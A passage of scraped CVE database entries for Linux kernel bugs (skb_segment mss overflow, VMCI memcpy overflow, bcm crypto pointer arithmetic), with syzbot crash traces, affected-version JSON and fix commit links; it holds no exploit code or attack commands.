packet_sendmsg+0x24c6/0x5220 net/packet/af_packet.c:3119
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg+0xd5/0x180 net/socket.c:745
__sys_sendto+0x255/0x340 net/socket.c:2190
__do_sys_sendto net/socket.c:2202 [inline]
__se_sys_sendto net/socket.c:2198 [inline]
__x64_sys_sendto+0xe0/0x1b0 net/socket.c:2198
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0x40/0x110 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
RIP: 0033:0x7f8692032aa9
Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 d1 19 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007fff8d685418 EFLAGS: 00000246 ORIG_RAX: 000000000000002c
RAX: ffffffffffffffda RBX: 0000000000000003 RCX: 00007f8692032aa9
RDX: 0000000000010048 RSI: 00000000200000c0 RDI: 0000000000000003
RBP: 00000000000f4240 R08: 0000000020000540 R09: 0000000000000014
R10: 0000000000000000 R11: 0000000000000246 R12: 00007fff8d685480
R13: 0000000000000001 R14: 00007fff8d685480 R15: 0000000000000003
</TASK>
Modules linked in:
---[ end trace 0000000000000000 ]---
RIP: 0010:skb_segment+0x181d/0x3f30 net/core/skbuff.c:4551
Code: 83 e3 02 e9 fb ed ff ff e8 90 68 1c f9 48 8b 84 24 f8 00 00 00 48 8d 78 70 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 <0f> b6 04 02 84 c0 74 08 3c 03 0f 8e 8a 21 00 00 48 8b 84 24 f8 00
RSP: 0018:ffffc900043473d0 EFLAGS: 00010202
RAX: dffffc0000000000 RBX: 0000000000010046 RCX: ffffffff886b1597
RDX: 000000000000000e RSI: ffffffff886b2520 RDI: 0000000000000070
RBP: ffffc90004347578 R0
---truncated---
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 3953c46c3ac7eef31a9935427371c6f54a22f1ba Version: 3953c46c3ac7eef31a9935427371c6f54a22f1ba Version: 3953c46c3ac7eef31a9935427371c6f54a22f1ba Version: 3953c46c3ac7eef31a9935427371c6f54a22f1ba Version: 3953c46c3ac7eef31a9935427371c6f54a22f1ba Version: 3953c46c3ac7eef31a9935427371c6f54a22f1ba Version: 3953c46c3ac7eef31a9935427371c6f54a22f1ba |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52435",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-22T16:45:46.929589Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:56.333Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:55:41.660Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cd1022eaf87be8e6151435bd4df4c242c347e083"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8f8f185643747fbb448de6aab0efa51c679909a3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6c53e8547687d9c767c139cd4b50af566f58c29a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/989b0ff35fe5fc9652ee5bafbe8483db6f27b137"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/95b3904a261a9f810205da560e802cc326f50d77"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/23d05d563b7e7b0314e65c8e882bc27eac2da8e7"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/core/skbuff.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0d3ffbbf8631d6db0552f46250015648991c856f",
"status": "affected",
"version": "3953c46c3ac7eef31a9935427371c6f54a22f1ba",
"versionType": "git"
},
{
"lessThan": "cd1022eaf87be8e6151435bd4df4c242c347e083",
"status": "affected",
"version": "3953c46c3ac7eef31a9935427371c6f54a22f1ba",
"versionType": "git"
},
{
"lessThan": "8f8f185643747fbb448de6aab0efa51c679909a3",
"status": "affected",
"version": "3953c46c3ac7eef31a9935427371c6f54a22f1ba",
"versionType": "git"
},
{
"lessThan": "6c53e8547687d9c767c139cd4b50af566f58c29a",
"status": "affected",
"version": "3953c46c3ac7eef31a9935427371c6f54a22f1ba",
"versionType": "git"
},
{
"lessThan": "989b0ff35fe5fc9652ee5bafbe8483db6f27b137",
"status": "affected",
"version": "3953c46c3ac7eef31a9935427371c6f54a22f1ba",
"versionType": "git"
},
{
"lessThan": "95b3904a261a9f810205da560e802cc326f50d77",
"status": "affected",
"version": "3953c46c3ac7eef31a9935427371c6f54a22f1ba",
"versionType": "git"
},
{
"lessThan": "23d05d563b7e7b0314e65c8e882bc27eac2da8e7",
"status": "affected",
"version": "3953c46c3ac7eef31a9935427371c6f54a22f1ba",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/core/skbuff.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.8"
},
{
"lessThan": "4.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.321",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.7",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.321",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.11",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7",
"versionStartIncluding": "4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: prevent mss overflow in skb_segment()\n\nOnce again syzbot is able to crash the kernel in skb_segment() [1]\n\nGSO_BY_FRAGS is a forbidden value, but unfortunately the following\ncomputation in skb_segment() can reach it quite easily :\n\n\tmss = mss * partial_segs;\n\n65535 = 3 * 5 * 17 * 257, so many initial values of mss can lead to\na bad final result.\n\nMake sure to limit segmentation so that the new mss value is smaller\nthan GSO_BY_FRAGS.\n\n[1]\n\ngeneral protection fault, probably for non-canonical address 0xdffffc000000000e: 0000 [#1] PREEMPT SMP KASAN\nKASAN: null-ptr-deref in range [0x0000000000000070-0x0000000000000077]\nCPU: 1 PID: 5079 Comm: syz-executor993 Not tainted 6.7.0-rc4-syzkaller-00141-g1ae4cd3cbdd0 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/10/2023\nRIP: 0010:skb_segment+0x181d/0x3f30 net/core/skbuff.c:4551\nCode: 83 e3 02 e9 fb ed ff ff e8 90 68 1c f9 48 8b 84 24 f8 00 00 00 48 8d 78 70 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 \u003c0f\u003e b6 04 02 84 c0 74 08 3c 03 0f 8e 8a 21 00 00 48 8b 84 24 f8 00\nRSP: 0018:ffffc900043473d0 EFLAGS: 00010202\nRAX: dffffc0000000000 RBX: 0000000000010046 RCX: ffffffff886b1597\nRDX: 000000000000000e RSI: ffffffff886b2520 RDI: 0000000000000070\nRBP: ffffc90004347578 R08: 0000000000000005 R09: 000000000000ffff\nR10: 000000000000ffff R11: 0000000000000002 R12: ffff888063202ac0\nR13: 0000000000010000 R14: 000000000000ffff R15: 0000000000000046\nFS: 0000555556e7e380(0000) GS:ffff8880b9900000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000020010000 CR3: 0000000027ee2000 CR4: 00000000003506f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n\u003cTASK\u003e\nudp6_ufo_fragment+0xa0e/0xd00 net/ipv6/udp_offload.c:109\nipv6_gso_segment+0x534/0x17e0 net/ipv6/ip6_offload.c:120\nskb_mac_gso_segment+0x290/0x610 net/core/gso.c:53\n__skb_gso_segment+0x339/0x710 net/core/gso.c:124\nskb_gso_segment include/net/gso.h:83 [inline]\nvalidate_xmit_skb+0x36c/0xeb0 net/core/dev.c:3626\n__dev_queue_xmit+0x6f3/0x3d60 net/core/dev.c:4338\ndev_queue_xmit include/linux/netdevice.h:3134 [inline]\npacket_xmit+0x257/0x380 net/packet/af_packet.c:276\npacket_snd net/packet/af_packet.c:3087 [inline]\npacket_sendmsg+0x24c6/0x5220 net/packet/af_packet.c:3119\nsock_sendmsg_nosec net/socket.c:730 [inline]\n__sock_sendmsg+0xd5/0x180 net/socket.c:745\n__sys_sendto+0x255/0x340 net/socket.c:2190\n__do_sys_sendto net/socket.c:2202 [inline]\n__se_sys_sendto net/socket.c:2198 [inline]\n__x64_sys_sendto+0xe0/0x1b0 net/socket.c:2198\ndo_syscall_x64 arch/x86/entry/common.c:52 [inline]\ndo_syscall_64+0x40/0x110 arch/x86/entry/common.c:83\nentry_SYSCALL_64_after_hwframe+0x63/0x6b\nRIP: 0033:0x7f8692032aa9\nCode: 28 00 00 00 75 05 48 83 c4 28 c3 e8 d1 19 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007fff8d685418 EFLAGS: 00000246 ORIG_RAX: 000000000000002c\nRAX: ffffffffffffffda RBX: 0000000000000003 RCX: 00007f8692032aa9\nRDX: 0000000000010048 RSI: 00000000200000c0 RDI: 0000000000000003\nRBP: 00000000000f4240 R08: 0000000020000540 R09: 0000000000000014\nR10: 0000000000000000 R11: 0000000000000246 R12: 00007fff8d685480\nR13: 0000000000000001 R14: 00007fff8d685480 R15: 0000000000000003\n\u003c/TASK\u003e\nModules linked in:\n---[ end trace 0000000000000000 ]---\nRIP: 0010:skb_segment+0x181d/0x3f30 net/core/skbuff.c:4551\nCode: 83 e3 02 e9 fb ed ff ff e8 90 68 1c f9 48 8b 84 24 f8 00 00 00 48 8d 78 70 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 \u003c0f\u003e b6 04 02 84 c0 74 08 3c 03 0f 8e 8a 21 00 00 48 8b 84 24 f8 00\nRSP: 0018:ffffc900043473d0 EFLAGS: 00010202\nRAX: dffffc0000000000 RBX: 0000000000010046 RCX: ffffffff886b1597\nRDX: 000000000000000e RSI: ffffffff886b2520 RDI: 0000000000000070\nRBP: ffffc90004347578 R0\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:36:25.408Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0d3ffbbf8631d6db0552f46250015648991c856f"
},
{
"url": "https://git.kernel.org/stable/c/cd1022eaf87be8e6151435bd4df4c242c347e083"
},
{
"url": "https://git.kernel.org/stable/c/8f8f185643747fbb448de6aab0efa51c679909a3"
},
{
"url": "https://git.kernel.org/stable/c/6c53e8547687d9c767c139cd4b50af566f58c29a"
},
{
"url": "https://git.kernel.org/stable/c/989b0ff35fe5fc9652ee5bafbe8483db6f27b137"
},
{
"url": "https://git.kernel.org/stable/c/95b3904a261a9f810205da560e802cc326f50d77"
},
{
"url": "https://git.kernel.org/stable/c/23d05d563b7e7b0314e65c8e882bc27eac2da8e7"
}
],
"title": "net: prevent mss overflow in skb_segment()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52435",
"datePublished": "2024-02-20T18:27:27.245Z",
"dateReserved": "2024-02-20T12:30:33.290Z",
"dateUpdated": "2025-05-04T07:36:25.408Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35944 (GCVE-0-2024-35944)
Vulnerability from cvelistv5
Published
2024-05-19 10:10
Modified
2025-05-04 09:08
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
VMCI: Fix memcpy() run-time warning in dg_dispatch_as_host()
Syzkaller hit 'WARNING in dg_dispatch_as_host' bug.
memcpy: detected field-spanning write (size 56) of single field "&dg_info->msg"
at drivers/misc/vmw_vmci/vmci_datagram.c:237 (size 24)
WARNING: CPU: 0 PID: 1555 at drivers/misc/vmw_vmci/vmci_datagram.c:237
dg_dispatch_as_host+0x88e/0xa60 drivers/misc/vmw_vmci/vmci_datagram.c:237
Some code commentry, based on my understanding:
544 #define VMCI_DG_SIZE(_dg) (VMCI_DG_HEADERSIZE + (size_t)(_dg)->payload_size)
/// This is 24 + payload_size
memcpy(&dg_info->msg, dg, dg_size);
Destination = dg_info->msg ---> this is a 24 byte
structure(struct vmci_datagram)
Source = dg --> this is a 24 byte structure (struct vmci_datagram)
Size = dg_size = 24 + payload_size
{payload_size = 56-24 =32} -- Syzkaller managed to set payload_size to 32.
35 struct delayed_datagram_info {
36 struct datagram_entry *entry;
37 struct work_struct work;
38 bool in_dg_host_queue;
39 /* msg and msg_payload must be together. */
40 struct vmci_datagram msg;
41 u8 msg_payload[];
42 };
So those extra bytes of payload are copied into msg_payload[], a run time
warning is seen while fuzzing with Syzkaller.
One possible way to fix the warning is to split the memcpy() into
two parts -- one -- direct assignment of msg and second taking care of payload.
Gustavo quoted:
"Under FORTIFY_SOURCE we should not copy data across multiple members
in a structure."
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35944",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T14:30:02.800597Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:54.146Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.080Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e87bb99d2df6512d8ee37a5d63d2ca9a39a8c051"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f15eca95138b3d4ec17b63c3c1937b0aa0d3624b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ad78c5047dc4076d0b3c4fad4f42ffe9c86e8100"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/130b0cd064874e0d0f58e18fb00e6f3993e90c74"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/feacd430b42bbfa9ab3ed9e4f38b86c43e348c75"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dae70a57565686f16089737adb8ac64471570f73"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/491a1eb07c2bd8841d63cb5263455e185be5866f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/19b070fefd0d024af3daa7329cbc0d00de5302ec"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/misc/vmw_vmci/vmci_datagram.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e87bb99d2df6512d8ee37a5d63d2ca9a39a8c051",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f15eca95138b3d4ec17b63c3c1937b0aa0d3624b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ad78c5047dc4076d0b3c4fad4f42ffe9c86e8100",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "130b0cd064874e0d0f58e18fb00e6f3993e90c74",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "feacd430b42bbfa9ab3ed9e4f38b86c43e348c75",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "dae70a57565686f16089737adb8ac64471570f73",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "491a1eb07c2bd8841d63cb5263455e185be5866f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "19b070fefd0d024af3daa7329cbc0d00de5302ec",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/misc/vmw_vmci/vmci_datagram.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.155",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.86",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.155",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.86",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nVMCI: Fix memcpy() run-time warning in dg_dispatch_as_host()\n\nSyzkaller hit \u0027WARNING in dg_dispatch_as_host\u0027 bug.\n\nmemcpy: detected field-spanning write (size 56) of single field \"\u0026dg_info-\u003emsg\"\nat drivers/misc/vmw_vmci/vmci_datagram.c:237 (size 24)\n\nWARNING: CPU: 0 PID: 1555 at drivers/misc/vmw_vmci/vmci_datagram.c:237\ndg_dispatch_as_host+0x88e/0xa60 drivers/misc/vmw_vmci/vmci_datagram.c:237\n\nSome code commentry, based on my understanding:\n\n544 #define VMCI_DG_SIZE(_dg) (VMCI_DG_HEADERSIZE + (size_t)(_dg)-\u003epayload_size)\n/// This is 24 + payload_size\n\nmemcpy(\u0026dg_info-\u003emsg, dg, dg_size);\n\tDestination = dg_info-\u003emsg ---\u003e this is a 24 byte\n\t\t\t\t\tstructure(struct vmci_datagram)\n\tSource = dg --\u003e this is a 24 byte structure (struct vmci_datagram)\n\tSize = dg_size = 24 + payload_size\n\n{payload_size = 56-24 =32} -- Syzkaller managed to set payload_size to 32.\n\n 35 struct delayed_datagram_info {\n 36 struct datagram_entry *entry;\n 37 struct work_struct work;\n 38 bool in_dg_host_queue;\n 39 /* msg and msg_payload must be together. */\n 40 struct vmci_datagram msg;\n 41 u8 msg_payload[];\n 42 };\n\nSo those extra bytes of payload are copied into msg_payload[], a run time\nwarning is seen while fuzzing with Syzkaller.\n\nOne possible way to fix the warning is to split the memcpy() into\ntwo parts -- one -- direct assignment of msg and second taking care of payload.\n\nGustavo quoted:\n\"Under FORTIFY_SOURCE we should not copy data across multiple members\nin a structure.\""
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:08:56.644Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e87bb99d2df6512d8ee37a5d63d2ca9a39a8c051"
},
{
"url": "https://git.kernel.org/stable/c/f15eca95138b3d4ec17b63c3c1937b0aa0d3624b"
},
{
"url": "https://git.kernel.org/stable/c/ad78c5047dc4076d0b3c4fad4f42ffe9c86e8100"
},
{
"url": "https://git.kernel.org/stable/c/130b0cd064874e0d0f58e18fb00e6f3993e90c74"
},
{
"url": "https://git.kernel.org/stable/c/feacd430b42bbfa9ab3ed9e4f38b86c43e348c75"
},
{
"url": "https://git.kernel.org/stable/c/dae70a57565686f16089737adb8ac64471570f73"
},
{
"url": "https://git.kernel.org/stable/c/491a1eb07c2bd8841d63cb5263455e185be5866f"
},
{
"url": "https://git.kernel.org/stable/c/19b070fefd0d024af3daa7329cbc0d00de5302ec"
}
],
"title": "VMCI: Fix memcpy() run-time warning in dg_dispatch_as_host()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35944",
"datePublished": "2024-05-19T10:10:48.183Z",
"dateReserved": "2024-05-17T13:50:33.133Z",
"dateUpdated": "2025-05-04T09:08:56.644Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38579 (GCVE-0-2024-38579)
Vulnerability from cvelistv5
Published
2024-06-19 13:37
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
crypto: bcm - Fix pointer arithmetic
In spu2_dump_omd() value of ptr is increased by ciph_key_len
instead of hash_iv_len which could lead to going beyond the
buffer boundaries.
Fix this bug by changing ciph_key_len to hash_iv_len.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9d12ba86f818aa9cfe9f01b750336aa441f2ffa2 Version: 9d12ba86f818aa9cfe9f01b750336aa441f2ffa2 Version: 9d12ba86f818aa9cfe9f01b750336aa441f2ffa2 Version: 9d12ba86f818aa9cfe9f01b750336aa441f2ffa2 Version: 9d12ba86f818aa9cfe9f01b750336aa441f2ffa2 Version: 9d12ba86f818aa9cfe9f01b750336aa441f2ffa2 Version: 9d12ba86f818aa9cfe9f01b750336aa441f2ffa2 Version: 9d12ba86f818aa9cfe9f01b750336aa441f2ffa2 Version: 9d12ba86f818aa9cfe9f01b750336aa441f2ffa2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:33.961Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c256b616067bfd6d274c679c06986b78d2402434"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e719c8991c161977a67197775067ab456b518c7b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ebed0d666fa709bae9e8cafa8ec6e7ebd1d318c6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c69a1e4b419c2c466dd8c5602bdebadc353973dd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/49833a8da6407e7e9b532cc4054fdbcaf78f5fdd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d0f14ae223c2421b334c1f1a9e48f1e809aee3a0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c0082ee420639a97e40cae66778b02b341b005e5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3b7a40740f04e2f27114dfd6225c5e721dda9d57"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2b3460cbf454c6b03d7429e9ffc4fe09322eb1a9"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38579",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
